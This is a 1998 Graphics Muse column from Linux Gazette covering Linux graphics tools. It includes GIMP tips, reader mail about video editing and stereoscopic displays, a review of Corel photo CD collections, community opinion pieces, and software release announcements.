More sites can be found from Yahoo's listings:  http://dir.yahoo.com/Arts/Design_Arts/Graphic_Design/Typography/Typefaces/
...another 3D modeller is under development, this one using C and Tcl/TK.  This one is called Mops and has support for NURB curves and RIB export files.  Take a look at The Mops Home Page.

...there are a couple of newsgroups being run off the POV-Ray web site for the discussion of POV-Ray, the 3D raytracing tool and the display of images.  Take a look at news://news.povray.org/povray.binaries.images and news://news.povray.org/povray.general.

...a very good explanation of using matrix transformations with POV-Ray can be found at http://www.erols.com/vansickl/matrix.htm.  Additionally, you can find some useful POV-Ray macros at http://www.erols.com/vansickl/macs.htm.

Q and A

Q:  What does one use [in the Gimp] in place of Photoshop's smudgy finger?  I've tried using the "fill with color or gradient" to no avail.  I just want to smudge.  Ideas?

A:  There is no smudge tool. It has been oft requested, but noone has written one.  Some not quite the same alternatives: the blur tool, iwarp, or selecting a region a bit and applying a gaussian blur.  Not the same, but alas...

Adrian Likins
Q:   I want to place a block of text with evenly single-spaced lines using some arbitrary font onto my Gimp image.  Rather than doing it line by line with the Text Tool, is there an easier way?

A:  While the Ascii2Image is probably the nicest solution, there is another somewhat more obscure method.  Using Cut and Paste into the text tool entry, the the text tool has no problems with newline characters - you can make multiple text lines directly from the text tool this way.

Seth Burgess
Q:  Is there any way to get gimp to use virtual memory instead of its swap file? I was working on some images where the gimp swap file was about 30mb. Just about any operation I do causes lots of disk activity. The machine I'm running this on has more than enough physical memory, but it is not being used.

A: Change the value for the gimp tile cahce in the Preferences dialog.  I'd say with 160mb set it to at least 80megs or so.

Adrian Likins
Q:  Ok now I'm new to linux and gimp - my friends got me into linux in the last couple months.  How can I, in Gimp save a file without having to merge the layers and still have the graphic look the way its supposed to?  Am I just really missing something here?

A:  If you just want to save an "in-progress" verison of your image that preserves layers, guides, channels, selections,etc then you should be saving as .xcf. That's gimps native format.

If you want to "export" an image to a single layer format but not have to merge the layers, you should have a look at Simon Budig's export scripts that automate this task. These scripts can be found at:

http://www.home.unix-ag.org/simon/gimp/export-file.html
Adrian Likins
'Muse Note:  as you can see, Adrian and Seth offer some pretty good advice on the Gimp User's Mailing list!

Reader Mail

wrote:
Hi Mr Hammel,
Looking at the April 98 issue...
Reader Mail
Nick Cali ([email protected]) wrote:
      Just want to drop a line thanking you for your effort at the Gazette and with Linux.  Really, thanks a lot.

Muse:  You're quite welcome.  I had gotten some rather harsh email from someone recently that had me considering dropping out of the Linux world altogether.  Getting little notes like this, however, helps keep me going.  Thanks!

Love the column,
Please stay,
'nuff said.

:-)
[email protected]

'Muse:  Woohoo!  My favorite kind of reader mail.  Ok.  I'll stick around for a while longer.

In a previous message, Rolf Magnus Nilsen says:

I'm really sorry for bothering you with this problem, but as an avid reader of the Linux Gazette and the Linux Journal I have read most of your writings there. And hope you can take the time to answer some questions.


'Muse:  No problem.  I try to answer all the questions that come my way, if I can.

Now, we are going to do a small project in VHS video, and we need some tools for video editing. The problem is, we cant find any tools besides the simplest command line tools.
'Muse:  Thats because there aren't any "canned" tools yet.  See below.
So our current plan is to run a framegrabber, grab about 25 pictures a second, organise them, put in effects/text and use mpegencode to make a movie which we play back to our VCR.  But this is quite a task, when you consider a movie of about 45 - 50 minutes.

I have been searching around quite a bit, but have not found anything better than the tools I mentioned.

Do you know any resources or products I should have a look at. Buying a commercial product is OK if it runs under Linux..

'Muse:  Unfortunately this area of graphics tools on Linux is pretty sparse.  Like you said, there are a number of command line tools for doing very specific tasks (like frame grabbers or creating MPEG video animations) but there aren't  any user-friendly, GUI based tools like, for example, Adobe Premier.

That said, there is one project you might want to look into.  The project is called Moxy (http://millennium.diads.com/moxy/).   Not much information there yet, but its aim is to be a Premier-style application.  Its in *very* early development.

You might also drop a line to the Gimp-Developer mailing list.  A number of people had been discussing creating an application like this on that mailing list.  I haven't heard whats become of this, however.  Adding a plug-in to the Gimp wouldn't be the best way to handle video editing - the Gimp isn't designed for that type of work.  But eventually interfaces should be (re: ought to be) developed that allow easy transfer between the Gimp and video editing tools.

No commercial packages that I know of are being ported yet.  Desktop publishing on Linux is still somewhat limited to word processors and the Gimp, which lacks color management facilities that are quite important to most desktop publishing and video editing environments.

I'll post your message (actually this reply) to the next Graphics Muse column and perhaps someone with more information than I have will contact you.  If you hear of any commercial packages being ported let me know.  I'd love to start hearing of such ports!

BTW: I'm really looking forward to "The Artists' Guide to the GIMP", it is ordered already :-)
'Muse:  Hey!  A sale!  The first official one that I know of.  I hope you find it useful!

In a previous message, Dylan The Hippy Wabbit says:

I have a particular interest in stereoscopic vision, and so I would like to have an X server that supports shutter glasses.
'Muse:  (Note - doesn't anyone go by their real names anymore?)  Ouch.  My eyes are hurting already just thinking about these.  People (like me) who have one eye "stronger" than the other can't see these images, at least not very well.  They give me a headache (so do 3D glasses).
In case you haven't heard of these, they use liquid crystals to alternately cover each eye.  The display then alternates in phase so that each eye sees only one view.  Apart from it's use in photography or molecular modelling it makes one hell of an extension to Quake!

Some, although only a few, 3D accelerators support them and there is an extensive web site including homebrewed controllers at:-

http://www.stereo3d.com/3dhome.htm

However, I can't find any mention of it in the XFree86 docs.  The AcceleratedX web site mentions support for "3D PEX" which I assume is a typo, although it could be something genuine I've never heard of.  I've searched the LG archive to find only your mention of a POVRAY "beamsplitter" in issue 27.

Do you know of anything?  After all, we can't let DOS/Windows users have anything we can't get can we?  ;-)

'Muse:  No such beast is yet available.  Its just not in high demand so you probably won't see it from the commercial vendors unless a paying business customer requests it (with some serious dollars behind the request).  XFree86 will support it as soon as someone decides they want/need it and have the time/expertise to write the code for it.  If the video cards handle it already then its just a matter of adding that support to an existing video card driver (assuming a standard, well known video chipset on the card).  The problem is usually finding someone who knows how to do that.  A post to comp.os.linux.x or maybe a letter to the Linux Gazette editor () will put you in contact with someone.  The LG editor will simply post your request in the next issue of the Gazette and, with luck, someone will contact you about their current work in this area.  You might also try sending a letter to the XFree86 support address (its listed on their web site www.xfree86.org).

I'll post your message in the November Muse column.  Maybe one of my readers will contact you about this.  Keep your fingers crossed!

BTW, 3D PEX is not a typo.  PEX is the PHIGS Extension, a formal X Extension that supports PHIGS, which is the Programmers Hierarchical Interactive Graphics System.  Thats a sort of OpenGL from the earlier days of computer graphics, although its still in use today in a few places.



Review:  Corel Super 10 Packs CD collections

I haven't been doing much with my Web site this past month.  Once I got the new format running I didn't have much need to mess with it, although I do have to remove the Apache logs fairly often (12Mb of logs in less than 5 days causes me to keep running over my disk quota).  So I was a little unsure of what to write about for this months Web Wonderings.  That is until I wondered through a local computer retail outlet.  There on the shelves I found a number of Corel's Super Ten Pack CD image collections.

Normally I wouldn't consider using stock photos from Web-style CD collections because the quality of the photos generally isn't much better than what I can take myself.  Additionally, most of those "25,000 (or more) Image" collections you find on the shelves come with images suitable only for the Web - generally no more than about 1024x768 resolution.  These usually are far too small for any other media.

But an article in the September 1998 issue of Digital Video magazine covering stock image collections mentioned the Corel image collections, including their Super Ten Packs, as a source of quality stock images.  Since I trust this magazine more than my own common sense (which is still rather new to the graphic arts world) and due to Corel's fairly full-blown support for Linux, I decided to check out one or two of these collections.

What is a Corel Super Ten Pack?

The Super Ten Packs are collections of 10 CD's, each with 100 PhotoCD images on them.  The current collections are classified into a number of different categories:
 

Aircraft Food Seasons
Animals Gardens Sports & Leisure
Architecture Great Works of Art Textures
Art, Sculpture, & Design Landmarks Textures II
Business & Industry Museums & Artifacts Textures & Patterns
Canada Nature Textures & Patterns II
Cars People Transportation
England People II Travel
Fashion People III Underwater

There is also a Sampler Ten pack.  The sampler set has CD's titled, among others, "War", "Alien Landscapes" and "Success".  Unfortunately the limited documentation doesn't say from which other Ten Pack's these samples are taken.  I expect that Corel will expand this list further as well, since they tend to produce a large number of stock photography CDs in general.

The images are royalty free but there are some restrictions to their use.  First, you must display the following text somewhere in your publication:

This product/publication includes images from [insert full name of Corel product] which are protected by the copyright laws of the U.S., Canada and elsewhere. Used under license.
Since I'm reviewing the CDs in general I hope the above counts towards my meeting this requirement.  They also limit online display of the images to 512 X 768, but that may be only if you display the image unmodified.  Its not clear about if such restrictions exist for derivative works that use the images.

How do you get them?

The Super Ten Packs are available at computer retail outlets or online.  I purchased my two sets from MicroCenter here in Dallas.  Corel's online site contains thumbnails of all the images from their huge collection of images so that you can preview them before purchase.  All of the online versions have watermarks so don't get any ideas about trying to swipe them from their site (unless you like watermarked images).

Online ordering can be done at http://www.corel.com/products/clipartandphotos/photos/superten.htm.  You can also search for individual images and order those online at http://corel.digitalriver.com/.  I didn't check to see if you could actually order the photos individually or just in the sets that contain them but a reliable resource who has used the service in the past suggested you could purchase them individually.

When you go to http://corel.digitalriver.com/  just click on the Photo CD package image to get a list of titles.  From there you can click on the individual CDs to preview all of the images on each CD.  Each CD runs about $35-$45US.

What do you actually get?

I purchased two different sets, the Sampler Ten Pack and the Textures II Ten Pack.  Both run a little higher at the retail outlet, as expected, and came in boxed sets.  Inside the box I found the 10 CD's shrink wrapped along with a small pamphlet.  The pamphlet had the obligatory licensing information along with full color thumnail images of all the images on each CD, one page per CD.  This is quite useful and something I hadn't quite expected for some reason.

The images on the CD come in PhotoCD format.  This format specifies 5 different image sizes:

128x192
256x384
512x768
1024x1536
2048x3072
To read this format you have a couple of options.  First, the Gimp has a PhotoCD file plug-in.  You can tell if you have this plug-in installed if you try to open an existing file and the Open Options menu includes an entry for PCD.  If you try to open a file from the CD by double clicking on the filename in the Load Image dialog then the plug-in is started and you get the dialog shown at left.  You'll notice that this plug-in offers the additional resolution of 4096x6144.  I'm not certain if this is a valid PhotoCD resolution or not, but it didn't seem to matter.  Unfortunately, I was unable to read any of the images from the CD in resolutions higher than 512x768 using this plug-in.  I had to switch to an alternative option, the hpcdtoppm tool from NetPBM package.  With this program I could read the higher resolutions - up to 2048x3072 - into a PPM formatted file which I could then load into the Gimp.  I didn't have time to determine if the problem was with the Gimp plug-in or the CDs, but I suspect the plug-in is at fault since I could read the higher resolutions with hpcdtoppm.  Note that this plug-in works fine for resolutions up to 512x768.
 
 

[ More Web Wonderings ]


Off the shelf video cards: choosing the right solution the first time.
Metro Link X Input Support

State of the DisUnion

Its been two years since I started the Graphics Muse column in the Linux Gazette.  In that time I've watched Linux grow in ways many people felt possible but few could guarantee would actually happen.  I've also watched, with some dismay, the numerous battles being fought within our community and beyond.  So, I'd like to take this opportunity to just place my opinion on the record on a few of the issues we've all faced these past two years.  If you are easily annoyed by other peoples opinions then just skip down to the bit on Where to go from here or jump over to the off the shelf video cards article.

RMS vs. Raymond vs Users

Both RMS (Richard M. Stallman) and Eric Raymond have done wonders for the community and both should be applauded for their efforts and dedication.  However their spirited enthusiasm, in the manner and form which they display in public, is not necessarily what we need now.  Linux and free software/Open Software is a community, one that has grown beyond its bare communal spirit and now encompasses a metropolitan mix of individuals and groups.  And that mix includes a high number of end users - not developers, not hackers - users.  I wonder now if either RMS or Raymond is truly interested in the end user or is their focus solely on the developers needs.  At this point, the community needs to focus on both.
Commercial vs. Free and World Domination
Unlike many Linux fans, I have no problem with commercial (re: proprietary) software.  There are people who both need and desire commercial software, regardless of what developers might find as the higher moral ground.  I personally will use the tools which best suit my needs.  I have always wanted a Unix desktop, ever since my days working on the Dell Unix products in the early 1990's and Linux is it for me.  If commercial applications begin to show up that work well for me, I will use them.  I already use Applixware and commercial versions of the sound drivers and X server.  You don't have to encourage commercial development, but you shouldn't attack them either.  Having a different point of view does not make someone wrong or generally evil in all cases.  If you provide alternatives to commercial products you'll find many people who will both use and support those alternatives.  But to disuade others from using commercial products without first providing the alternative is tantamount to using the same tactics Microsoft uses with their vaporware announcements.  Convince by doing first.  It makes the counter argument, the argument for commercial or proprietary software, more difficult to sustain.

On a related subject:  World Domination by Linux is not a goal I seek.  The first reason is obvious - if you displace Microsoft you lose the strongest focal point that currently exists for the free software movement - the drive to displace Microsoft.  It is a bit of a catch-22 scenario, but I'd rather have Microsoft stay strong to keep developers on edge in the Linux community.  They seem to thrive on that.  Without real leadership in our community (and I'm not convinced we have that one strong individual or group that can claim that leadership role) it is imperitive that the strong focal point be kept clear.  Focus is key in any project, be it writing software or climbing mountains or writing columns like this one.

The other reason I don't want world domination is I really don't want to replace one egotistical maniac with several thousand (or million).  Great developers are egotistical - its a form of self confidence not unlike that displayed by great artists.  But I wouldn't want either in charge of my personal computing world.  They see the world from their perspective and that perspective can be clouded by their own intellect.  It can be difficult to see the frustration of others when their problems may seem trivial to you and easily solved.  Instead, I'd rather have the ability to control my own computing environment by having the opportunity to choose between multiple solutions to similar problems.  I'd love to see the Mac and BeOS expand their market share because, in the end, it only opens up my vistas of choice.  And thats what Linux is really about for end users.  Freedom of choice.

Vi vs. Emacs
Vi, of course.  Unless I have to write a book or article for non-Linux publishers.  Then ApplixWords.
Red Hat or Debian or S.u.S.E?
Depends on what you want and where you live mostly.  All three produce decent distributions.  I tend to think of Debian as aimed more towards the technical crowd while the other two are more amenable to the average Joe.  I use Red Hat 4.2.  Why?  Because 2 years ago when I was ready to upgrade from my Slackware distribution I went into SoftPro Books in Denver and found Red Hat abundantly stocked.  S.u.S.E wasn't there yet.  Neither was Debian.  It was a simple choice back then, really.  But like Linux in general, the good news is that I have choices.  Thats important.  I'll be upgrading again at the start of the year, probably in February.  By that time most of the kinks with dealing with libc/glibc should be worked out from the installation point of view.  I may go with Red Hat 5.2 if its out by then.  But S.u.S.E sure has had a lot of good press too.  But it probably doesn't matter that much.  I don't even use RPM's on my machine except during an initial installation.  After that, I install free software from source and commercial packages from CDs (in whatever form they come in).
GPL, LGPL, NPL, or Artistic License
See what I mean?  Choice.  This sort of thing seldom crops up in the Microsoft world.  Which is best?  I won't say.  Of all the arguments that have arisen repeatedly the past 2 years, this one is most certainly one of personal choice.  I will recommend, however, that if you consider releasing software to the free/Open community that you read through each of these and try to understand them before releasing and before creating your own license.  I did the latter.  It was a bad choice.
GPL:   http://www.gnu.org/copyleft/gpl.html
LGPL:  http://www.gnu.org/copyleft/lgpl.html
NPL:  http://www.mozilla.org/NPL/
Artistic:  http://language.perl.com/misc/Artistic.html
Where to go from here - Desktop Graphics

Ok, I've blabbered on for too long with my own opinions that really have nothing to do with graphics on Linux.  I need to focus.  What do we have now and what do we need?  How do we get it?  And who are "we"?'

We are the people who desire the tools to do the graphics arts work from which we both find enjoyment and make our livings.  As of now, the tools for Linux are mostly geared toward Web development, a medium born from the same family as the images we create.  Most of the tools are command line driven, with a few GUI-based tools like the Gimp or perhaps ImageMagick.  But we lack certain features to go beyond Web images.  We lack any real form of color management in the Gimp needed for prepress operations.  We have 3D modellers but are they sufficient for commercial animation work?  And what about video editing tools?  Nothing exists at this point beyond one project in a very early stage.  We have some hardware acceleration for 3D video chipsets but lack consistant support from vendors.  Most important, we need a desktop that makes porting of applications - or writing new ones - inviting to those who need to interact with other tools.

There are plenty of tools available for commercial artists and effects houses that already exist on other Unix platforms.  What would it take to make those people want to migrate to Linux?  Vendors are fond of saying that end user demand is what drives ports to new platforms.  We need to know if the demand exists and if not, then why not.  I've spoken to two effects houses in the past who use Linux in rendering farms (groups of Linux servers number crunching 3D images with little to no user interaction).  Linux as a server once more.  Is Linux not appropriate as the front end of the special effects development process?  What about for Desktop Publishing?  All you Quark and Adobe users - what do we need?  Would you use the ports if they were made available?

I write this column out of a desire to learn about computer graphics.  The only graphics tools I'd ever used before moving to Linux were MacDraw and MicroGrafix under DOS many years ago.  I'm not familiar with the Adobe series of graphics programs, nor Quark Express, nor the SoftImage tools or other SGI-based applications.  I need feedback from users of these tools to know what to pass on to the rest of my readership.  There are likely to be a few who would be willing to work on projects, if they new what needed to be done.  And grass roots efforts by end users to convince commercial vendors that ports of existing applications to Linux would be worth their effort are also needed.  Corel appears to be porting all their applications to Linux.  I assume this means Corel Draw will be coming out sometime in the next 6 months.  At least then I can see what a commercial application looks like.  If I could only get my hands on Adobe Premier or Quark Express for Linux.....

Most important of all, I need to know what the readers need - desktop tools for the small prepress environment?  Web tools?  High end graphics tools for research and the entertainment industries?  Perhaps multimedia authoring tools?  Or just simple tools for doing common tasks at home, those that are readily available for the Mac and MS platforms and cost a buck and a quarter at the local computer retail outlet.

Graphics on Linux needs focus.  We have the kernel supporters and the desktop supporters who have driven the server side of Linux to the point that the rest of the world is not only aware of Linux but enthusiastic about joining the community.  Now we need the graphics folks to mobilize and show that we can go beyond the realm of back room servers.

Or can we?

[ More Musings ]
 


The following links are just starting points for finding more information about computer graphics and multimedia in general for Linux systems. If you have some application specific information for me, I'll add them to my other pages or you can contact the maintainer of some other web site. I'll consider adding other general references here, but application or site specific information needs to go into one of the following general references and not listed here.
 
Online Magazines and News sources 
C|Net Tech News
Linux Weekly News
Slashdot.org

General Web Sites 
Linux Graphics mini-Howto
Unix Graphics Utilities
Linux Sound/Midi Page

Some of the Mailing Lists and Newsgroups I keep an eye on and where I get much of the information in this column 
The Gimp User and Gimp Developer Mailing Lists. 
The IRTC-L discussion list
comp.graphics.rendering.raytracing
comp.graphics.rendering.renderman
comp.graphics.api.opengl
comp.os.linux.announce

Future Directions

Next month:



© 1998


Previous ``Graphics Muse'' Columns

Graphics Muse #1, November 1996
Graphics Muse #2, December 1996
Graphics Muse #3, January 1997
Graphics Muse #4, February 1997
Graphics Muse #5, March 1997
Graphics Muse #6, April 1997
Graphics Muse #7, May 1997
Graphics Muse #8, June 1997
Graphics Muse #9, July 1997
Graphics Muse #10, August 1997
Graphics Muse #11, October 1997
Graphics Muse #12, December 1997
Graphics Muse #13, February 1998
Graphics Muse #14, March 1998
Graphics Muse #15, April 1998
Graphics Muse #16, August 1998
Graphics Muse #17, September 1998
Graphics Muse #18, October 1998


Copyright © 1998, Michael J. Hammel
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


 

© 1998
indent
Blender Manual
Moxy 0.1.2
Quick Image Viewer 0.9.1
GQView 0.4.3
FLTK 19981006
XawTV 2.28
jmk-x11-fonts 1.2
KIllustrator
MathMap
Metro-X 4.3
GNU PlotUtils 2.1.6
Simple DirectMedia Layer Version 0.8
tkscanfax
MAM/VRS
Xi Graphics
  • SiS 5598
  • NeoMagic, Toshiba, Gateway, benchmarks
  • 3D Hardware Support
  • Monthly drawing for FREE Accelerated-X
Disclaimer: Before I get too far into this I should note that any of the news items I post in this section are just that - news. Either I happened to run across them via some mailing list I was on, via some Usenet newsgroup, or via email from someone. I'm not necessarily endorsing these products (some of which may be commercial), I'm just letting you know I'd heard about them in the past month.

Blender Manual is now available for ordering
The Blender Manual is available for purchase:  http://www.blender.nl/shop/index.html.  Looks to be about $49US for a fairly hefty manual.


Moxy 0.1.2
Moxy is a linear video editor, much like Adobe's Premiere. It can load many different file format (Including MJPEG AVIs, P*Ms and JMF) and output AVIs. It comes with some transitions (you can make some yourself, they're plugins) and you are free to contribute code. 
http://millennium.diads.com/moxy/


Quick Image Viewer 0.9.1
Quick Image Viewer (qiv) is a very small and pretty fast GDK/Imlib image viewer.  Features include zoom, maxpect, scale down, fullscreen, brightness/contrast/gamma correction, slideshow, flip horizontal/vertical, rotate left/right, delete (move to .qiv-trash/), jump to image x, jump forward/backward x images, filename filer and you can use qiv to set your X11-Desktop background.

This version works on Solaris/SunOS again.
http://www.geocities.com/SiliconValley/Haven/5235/



GQview 0.4.3
GQview is an X11 image viewer for the Linux operating system. Its key features include single click file viewing, external editor support, thumbnail preview, thumbnail caching and adjustable zoom. GQview is currently available in source, binary, and rpm versions and requires the latest GTK and Imlib libraries.

This release adds copy and move capabilities, the ability to hide the tools area, cancel thumbnail generation by pressing Escape, and more.
http://www.klografx.de/
http://www.geocities.com/SiliconValley/Haven/5235/



FLTK 19981006
FLTK (pronounced "fulltick") is a LGPL'd C++ user interface toolkit for X, OpenGL, and Microsoft Windows. FLTK is deliberately designed to be small, so that you can statically link it with your applications and not worry about installation problems. As a side effect it is also extremely fast.

On September 25, 1998, Digital Domain instructed Mr. Bill Spitzak to discontinue development of FLTK. Shortly thereafter a group of developers for FLTK reincarnated the library on a mirror site so that development could continue. The FLTK web page, FTP site, mailing list, and CVS server are being hosted by Easy Software Products, a small software firm located in Maryland. Easy Software Products develops commercial software and supports free software.
http://fltk.easysw.com/



XawTV 2.28
XawTV is a simple Xaw-based TV program which uses the bttv driver or video4linux. It contains various command-line utilities for grabbing images and avi movies, for tuning in TV stations, etc. A grabber driver for vic and a radio application (needs KDE) for the boards with radio support are included as well.
http://www.in-berlin.de/User/kraxel/xawtv.html


jmk-x11-fonts 1.2
The jmk-x11-fonts package contains character-cell fonts for use with the X Window System. The current font included in this package is NouveauGothic, a pleasantly legible variation on the standard fixed fonts that accompany most distributions of the X Window System. It comes in both normal and bold weights in small, medium, large, and extra-large sizes. Currently only ISO-8859-1 encoding is available.

New in this release of Jim's fonts for X is a set of alternate NouveauGothic fonts with a more traditionally shaped ampersand glyph, for those who don't particularly like the style of NG's regular ampersand.
http://www.ntrnet.net/~jmknoble/fonts/



KIllustrator 0.4.1
KIllustrator is a freely available vector-based drawing application for the famous K Desktop Environment similiar to Corel Draw(tm) or Adobe Illustrator(tm). This version contains a new layer facility as well as some bug fixes and performance improvements.
http://wwwiti.cs.uni-magdeburg.de/~sattler/killustrator.html


MathMap 0.7

MathMap is a GIMP plug-in which allows distortion of images specified by mathematical formulas. For each pixel in the generated image, an expression is evaluated which should return a pixel value. The expression can either refer to a pixel in the source image or can generate pixels completely independent of the source. MathMap not only allows the generation of still images but also of animations.

The MathMap homepage can be found at

http://www.unix.cslab.tuwien.ac.at/~schani/mathmap/
It includes a user's manual as well as screenshots and examples.

Changes since 0.6:

Mark Probst



METRO-X 4.3

The following announcement was posted to comp.os.linux.announce by MetroLink, Inc.

NOW AVAILABLE FOR LINUX/ALPHA!

The Metro-X Enhanced Server Set from Metro Link is now available for Linux/Alpha.  Metro-X provides more speed and more features at a very LOW PRICE!

Metro-X 4.3 is an X11 Release 6.3 server replacement with all the features you need.  It provides support for the fastest, most  popular graphics cards on the market today. In addition, Metro-X includes touch screen support and multi-screen support at no extra charge!  So what IS the charge?  Only $39!

===GRAPHICAL CONFIGURATION UTILITY===

Forget hand editing configuration files or clumsy character-based setup utilities.  Metro-X 4.3 includes a state-of-the-art graphical configuration program.  ConfigX helps you get up and running in no time.

===EXTENSIVE GRAPHICS CARD SUPPORT===

Want support for the latest, highest-performance graphics cards? Then you want Metro-X 4.3.  Check the Metro-X 4.3 cardlist for Linux/Alpha on the web site to see which cards are supported, as well as the available resolutions and colors for each.  In addition, as support becomes available for new cards between releases, these updates to Metro-X 4.3 will be made available at no charge.

===MONITOR SUPPORT===

Tired of adjusting your monitor or hand-editing timing parameters? With Metro-X you can relax.  Just select your monitor from the list and we do the rest.  Even adjusting the image is made easy with a graphical adjustment tool.  Using the mouse or keyboard, you simply stretch, shrink, or shift the image placement on the monitor!

===TOUCH SCREEN SUPPORT INCLUDED===

At no extra charge, Metro-X 4.3 includes support for several models of touch screens.  These include the serial touch-screen controllers from:

===MULTI-HEADED DISPLAY SUPPORT INCLUDED===

At no extra charge, Metro-X 4.3 includes support for up to 4 screens per server which can all be controlled simultaneously with a single keyboard and mouse.  This allows you to run many applications without overlapping windows.  The graphical configuration utility makes it simple to configure multiple graphics cards and even lets you pick the screen layout.  You can utilize this feature with many combinations of these cards:

 NOTE: Only one Mystique or Mystique 220 (not both) may be used in the combination.

===ROBUST PERFORMANCE===

Reliability and performance are the foundation of Metro-X.  Our customers are using Metro-X in demanding applications from the Space Shuttle to the Battlefield.  Metro-X 4.3 incorporates advanced dynamic loader technology which eliminates the need to build servers for specific types of graphics cards.  It makes server configuration quick and easy.

===METRO OPENGL EXTENSION AVAILABLE SOON===

Using Metro-X's dynamic loader technology, adding an extension like Metro OpenGL is as easy as installing a package and running a program.  This product will be available for Linux/Alpha very soon.

===METRO LINK TECH SUPPORT===

As always, software purchased from Metro Link comes with 90 days of free technical support (via phone, fax, or email) and a 30-day money-back guarantee.

===SYSTEM REQUIREMENTS===

HARDWARE:  Metro-X 4.3 requires 14 MB of disk space. 8MB of RAM are required; 16 MB are recommended.

SOFTWARE:  Packages are provided in both RPM and tar/gzip formats.  Metro-X 4.3 requires these minimum versions of software: Linux Kernel 2.0.30; glibc 2.0.5c; and XFree86 3.3.1.

===AVAILABILITY AND DISTRIBUTION===

PRICE:  Metro-X 4.3 is $39

AVAILABILITY: Now

DISTRIBUTION:  Metro-X is only distributed via FTP.  A postscript version of the Metro-X manual is included.  With a credit card payment, the FTP instructions are usually emailed on the same day the order is received.  Be sure to include your email address when ordering.

===CONTACT METRO LINK===

www.metrolink.com

+1-954-938-0283 ext. 1
+1-954-938-1982 fax



GNU PlotUtils 2.1.6

Version 2.1.6 of the GNU plotting utilities ("plotutils") package is now available.  This release includes a significantly enhanced version of the free C/C++ GNU libplot library for vector graphics, as well as seven command-line utilities oriented toward data plotting (graph, plot, tek2plot, plotfont, spline, ode, and double).  A 130-page manual in texinfo format is included.

As of this release, GNU libplot can produce graphics files in Adobe Illustrator format.  So you may now write C or C++ programs to draw vector graphics that Illustrator can edit.  Also, the support for the free `idraw' and `xfig' drawing editors has been enhanced.  For example, the file format used by xfig 3.2 is now supported.

RPM's for the plotutils package are available at ftp.redhat.com and at Red Hat mirror sites.  The following are available:

ftp://ftp.redhat.com/pub/contrib/i386/plotutils-2.1.6-1.i386.rpm
ftp://ftp.redhat.com/pub/contrib/sparc/plotutils-2.1.6-1.sparc.rpm
ftp://ftp.redhat.com/pub/contrib/SRPMS/plotutils-2.1.6-1.src.rpm
For more details on the package, see its official Web page, http://www.gnu.org/software/plotutils/plotutils.html .

I hope you find this release useful (send bug reports and suggestions for enhancement both to and to me).  Enjoy.
Robert S. Maier -



Simple DirectMedia Layer Version 0.8

This library is designed to make it easy to write games that run on Linux, Win32 and BeOS using the various native high-performance media interfaces, (for video, audio, etc) and presenting a single source-code level API to your application.  This is a fairly low level API, but using this, completely portable applications can be written with a great deal of flexibility.

SDL has been split into a stable release, 0.8.x, and a development release, 0.9.x. The stable version is very robust, having been extensively tested over the past 3 months. The development version has some exciting features in progress, such as automatically adjusting to display changes, CD-ROM support, and more.

Get it now from:  http://www.devolution.com/~slouken/SDL/

GIMP lovers, grab your brushes!
The "Official SDL Logo Contest" is now in session.  Send your entries, or instructions on downloading your entries, via e-mail to   The winner will get his or her logo on the SDL web site, and will get their names in the CREDITS list for the next version of SDL!  You can view the contest entries at http://www.devolution.com/~slouken/SDL/contest/.

And if you're wondering.. "what can I really do with SDL?", be sure and download the examples archive, which contains demontrations of:

If you are interested, join the development mailing list by sending e-mail to: 

Enjoy,  Sam Lantinga <>



tkscanfax
tkscanfax provides combined GUI for command line scanner driver and mgetty+sendfax, written in tcl/tk. It is a continuation of tkscan-0.8.  This version adds mgetty+sendfax GUI combined with tkscan to get fax scanning from tkscan.

It is available from http://muon.kaist.ac.kr/~hbkim/linux/tkscanfax and also from the apps/graphics/capture directory at Sunsite.

There is no documentation at this time.  Please send questions, problems, comments or suggestions to Hang Bae Kim <>



MAM/VRS

MAM/VRS is a library for animated, interactive 3D graphics, written in C++. It works on Unix (tested on Linux, Solaris and Irix) and Windows 95/98/NT. MAM/VRS can produce output for many rendering systems: OpenGL (or Mesa), POVRay, RenderMan and VRML are supported. It provides bindings to many GUIs: Xt (Motif/Lesstif/Athena), Qt, Tcl/Tk, MFC and soon Gtk. It is covered by the terms of the GNU LGPL. Visit our homepage for more information and to download it:

http://wwwmath.uni-muenster.de/~mam
Though this is the first public announcement, MAM/VRS has been in active development and use for a long time and is stable. MAM/VRS is not a 3D modeler or a 3D CAD/CAM program, but it ...

Xi Graphics

There were a slew of announcements from Xi Graphics posted to comp.os.linux.announce this past month.  I've globbed them together here under a single section.- 'Muse

SiS 5598 support

Xi Graphics made SiS 5598 support available on September 14th, joining the previously supported SiS 6326.  Configurations for 1, 2, 3 and 4MB are supported.

The SiS 5598 is not capable of supporting overlays but does support hardware gamma color correction in all color depths.  Maximum supported resolution is 1600x1200@60Hz in 8bpp, and 1024x768@75Hz in 24bpp (packed) operation.  Hardware cursor is supported in all color depths.  The Accelerated-X Server conforms to the X Window System as measured by the freely available X Test Suite.

The update, which should be applied against the desktop (AX version) Accelerated-X Server version 4.1.2, is available from the Xi Graphics Anon-FTP site at URL:

ftp://ftp.xig.com/pub/updates/accelx/desktop/4.1.2/D4102.013.tar.gz
Instructions for applying the update and more detail may be found in the URL:
ftp://ftp.xig.com/pub/updates/accelx/desktop/4.1.2/D4102.013.txt
The update may be applied to the freely available Accelerated-X demo at URL ftp://ftp.xig.com/pub/demos/AX412.Linux.tar.gz for customer testing prior to purchase of the product.
NeoMagic MagicMedia, including Toshiba Tecra 800 and the Gateway Solo 5150
Xi Graphics is pleased to announce the release of support for the NeoMagic MagicMedia 256AV, also known as the NM2200 and the NM2360.  This is much faster than previous NeoMagic chipsets as the new benchmarks show.  The initial machines explicitly supported are the Toshiba Tecra 800 and the Gateway Solo 5150.

Benchmark tests were conducted on a Toshiba Tecra 8000 with a Pentium II/266 Mhz processor, making the results broadly comparable with those for the ATI Rage LT Pro announced in August.  The Accelerated-X Server, Xaccel, passes the X Test Suite with hardware acceleration in all color depths.

Accelerated-X/OGL
Xi Graphics, leader in X Window System technologies for Intel Linux and UNIX Systems will be shipping a limited quantity edition Technology Demo of its' new Accelerated-X/OGL product.

Accelerated-X/OGL is the fifth architecture generation of Accelerated-X and has been specifically altered to provide support for a wide range of 3D graphics chips.  The limited edition Technical Demonstration release offers an opportunity for games and other developers to influence the final delivered product.  The Accelerated-X/OGL Technology Demo Evolution 1 product features:

For this limited edition of the product, please contact to apply for a copy.   The Xi Graphics Sales are unable to take orders for this product as we expect the demand to significantly exceed the supply!
Monthly drawings for copies of Accelerated-X
